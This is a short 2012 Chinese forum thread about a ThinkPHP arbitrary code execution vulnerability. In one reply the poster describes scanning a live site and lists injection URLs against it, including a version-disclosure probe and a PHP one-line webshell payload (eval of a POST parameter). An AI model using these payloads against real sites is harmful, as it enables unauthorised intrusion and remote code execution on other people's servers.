V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
ihacku

ThinkPHP framework 任意代码执行漏洞预警

  •  
  •   ihacku · Apr 9, 2012 · 5433 views
    This topic created in 5131 days ago, the information mentioned may be changed or developed.
    3 replies    1970-01-01 08:00:00 +08:00
    mywaiting
        1
    mywaiting  
       Apr 9, 2012
    乌云多了个水区后,我显然多了个可以去的好地方
    ihacku
        2
    ihacku  
    OP
       Apr 9, 2012
    本来我是刚买完票 随手用AWS测试个站 报PHP code injection
    http://taot**.net/events/content/id/${@print(md5(acunetix_wvs_security_test))}
    后来才看到乌云上的帖子的
    http://taot**.net/events/content/id/${@print(THINK_VERSION)}
    版本2.1 漏洞影响到的版本包括2.1、2.2和3.0
    不知道具体怎么利用 试着在后面加了一句话
    http://taot**.net/events/content/id/${@eval($_POST[cmd])}
    都是一闪就过去了
    ihacku
        3
    ihacku  
    OP
       Apr 9, 2012
    唔 代码被转掉了
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   5074 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 30ms · UTC 03:59 · PVG 11:59 · LAX 20:59 · JFK 23:59
    ♥ Do have faith in what you're doing.